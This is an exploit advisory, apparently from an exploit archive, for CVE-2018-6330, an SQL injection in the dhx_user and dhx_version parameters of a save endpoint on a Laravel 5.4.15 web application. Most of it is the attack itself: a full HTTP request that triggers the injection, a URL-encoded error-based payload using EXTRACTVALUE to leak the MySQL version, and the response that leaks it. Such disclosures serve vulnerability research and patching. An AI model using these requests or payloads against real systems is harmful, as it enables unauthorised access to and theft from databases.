#Exploit Title: Laravel SQLinjection 5.4.15

#Date: 26.01.2018

#Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQLinjection because it is not sanitized inside the save.php. The affected Parameters are dhx_user and dhx_version.

  • Proof of Concept

Login as user, then request:

GET /save?dhx_user=1516954053138’&dhx_version=1&swt_subdomain=center01 HTTP/1.1

Host: xxxxxx.net

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0

Accept: */*

Accept-Language: de,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: https://xxxxxxx.net/agenda

X-Requested-With: XMLHttpRequest

Response will be:

You have an Error in your Mysql Syntax.

To show the Database Version you can send the following Payload:

dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%282263%2CCONCAT%280x5c%2C0x7171766b71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C21%29%29%2C0x7176787171%29%29–%20WWGj

The Response will look like this:

[…]

<span class=“exception_message“>PDO – sql execution failed<br />

XPATH syntax error: ‚\qqvkq5.7.18-1qvxqq'</span>

[…]